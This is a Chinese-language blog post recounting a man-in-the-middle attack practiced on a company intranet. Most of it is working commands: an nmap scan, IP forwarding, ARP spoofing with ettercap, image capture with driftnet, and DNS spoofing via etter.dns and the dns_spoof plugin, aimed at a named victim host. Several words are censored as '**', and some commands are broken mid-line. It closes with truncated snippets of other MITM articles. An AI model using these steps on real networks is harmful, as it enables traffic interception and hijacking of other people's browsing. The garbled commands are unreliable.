正好在公司有機會玩玩內網滲透,於是實踐一下中間人攻擊
我所在的網段為10.0.100.0/24
攻擊者主機ip:10.0.100.133
受害者主機ip:10.0.100.136
閘道器:10.0.100.1
先用nmap掃瞄看看目前內網中在使用的主機ip
使用命令
nmap -ss 10.0.100.* //掃瞄整個網段中的主機情況,-ss為半開放掃瞄,掃瞄不容易被對方發現
使用arpspoof進行攻擊
啟用**功能,linux的路由功能
此處設定為0時,arp欺騙後可以實現讓對方斷網
root@kali
:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@kali
:~# cat /proc/sys/net/ipv4/ip_forward
1
向受害者傳送arp欺騙冒充閘道器,ip**關閉時這一步後目標主機就無法上網了
向閘道器傳送欺騙冒充受害者,有些**上後面ip寫成攻擊者的ip,試了試好像也能成功,原因不清楚
完成這兩步後受害者主機與閘道器之間的流量都會經過攻擊者電腦了,使用driftnet可以看到受害者瀏覽的
driftnet -i eth0 -ad
./drif
driftnet,-i:選擇網絡卡;-a:後台模式,儲存在目錄中不直接顯示;-d:儲存的路徑
可以直接只指定網絡卡開啟,即可不儲存直接瀏覽,不過跳的很快看不見什麼圖就都過去了,建議使用上面的命令
driftnet -i eth0
用受害者電腦瀏覽網頁後,攻擊者電腦目錄下即可看見受害者電腦瀏覽的
效果如下
使用ettercap進行攻擊
ettercap -i eth0 -tq
-m arp:remote /10.0
.100
.136
// ///
不填寫ip位址則預設對整個子網全部主機欺騙
ettercap -i eth0 -tq
-m arp:remote /// ///
-i, –iface #選擇網絡卡
-t, –text #文字模式顯示
-q, –quiet #安靜模式,不顯示嗅探資料
-m arp #arp欺騙
remote #雙向模式,同時arp欺騙通訊的雙方,引數 -m arp:remote
oneway #單向模式,只arp欺騙第乙個目標到第二個目標的通訊,引數 -m arp:oneway
之後就能使用driftnet檢視受害者瀏覽的了,使用urlsnarf可以檢視到受害者瀏覽的網頁詳細資訊
dsniff還有很多任務具可以檢視到被arp欺騙後的主機行為,後續再研究
arp欺騙之後可以繼續進行dns欺騙,將目標主機向dns伺服器發出的請求攔截,然後將解析的位址傳送給目標主機。
ettercap實現dns欺騙
nano /etc/ettercap/etter.dns
用文字編輯器開啟ettercap的dns檔案
在最後加上
* a 10.0.100.132
ettercap -t
-i eth0 -q
-p dns_spoof /10.0
.100
.136
// ///
-p, –plugin #載入外掛程式
這裡加入了dns_spoof外掛程式實現dns欺騙
不填ip則對子網中所有主機欺騙
受害者主機所有網域名稱都被解析為10.0.100.132了
效果好像並不好,常用**好像由於快取原因劫持不了,雖然ping的時候都成功劫持了,瀏覽器上試有時候並不成功
中間人攻擊
1.什麼是中間人攻擊 man in the middleattack 簡稱 mitm攻擊 通過各種技術手段將攻擊伺服器放置在兩台正常通訊的計算機之間。2.中間人攻擊的三種方式 1 dns欺騙 修改受害人計算機host,或者dns伺服器,控制路由器等方法,把受害人要訪問的網域名稱對應的ip解析為攻擊者...
中間人攻擊
前面的文章我們講到了rsa演算法以目前的手段是很難被攻破的,那麼使用rsa演算法是不是就一定安全了呢?答案當然是否,因為我們並沒有考慮到網路傳輸中的各種情況。本文會講一種攻擊叫做中間人攻擊,為了抵禦這種攻擊,我們引入證書的概念。我們會在後續的文章中講解證書的概念。這裡我們重點講一下中間人攻擊。所謂中...
Android 中間人攻擊
0x00 android中間人攻擊的思路就是劫持區域網中被攻擊機器和伺服器間的對話。被攻擊機器和伺服器表面上工作正常,實際上已經被中間人劫持。可以從一張圖來明白這個過程。受攻擊主機傳送的資料,首先經過了攻擊者,從伺服器返回的資料也經過攻擊者,再傳送給受攻擊主機。0x01 android開源中間人攻擊...